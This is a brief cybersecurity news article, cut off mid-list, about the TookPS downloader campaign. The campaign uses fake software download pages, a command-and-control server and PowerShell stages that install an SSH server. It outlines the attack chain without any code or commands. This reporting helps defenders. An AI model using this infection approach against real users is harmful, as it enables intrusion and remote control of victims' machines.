Hackers Use DeepSeek and Remote Desktop Apps to Deploy TookPS Malware

A recent investigation by cybersecurity researchers has uncovered a large-scale malware campaign leveraging the DeepSeek LLM and popular remote desktop applications to distribute the Trojan-Downloader.Win32.TookPS malware.

The attackers targeted both individual users and organizations by disguising malicious software as legitimate business tools, including UltraViewer, AutoCAD, and SketchUp.

Malicious Infrastructure and Infection Chain

The TookPS malware campaign begins with fraudulent websites mimicking official download pages for widely used software.

These sites lure victims into downloading compromised files, such as “Ableton.exe” or “QuickenApp.exe,” which are disguised as legitimate applications.

Once installed, the TookPS downloader initiates communication with a command-and-control (C2) server embedded in its code.

This server delivers a series of PowerShell commands designed to download additional malicious payloads.

The infection chain involves three key stages:

1. Payload Delivery: The first PowerShell script downloads an SSH server executable (“sshd.exe”) along with its configuration and RSA key ...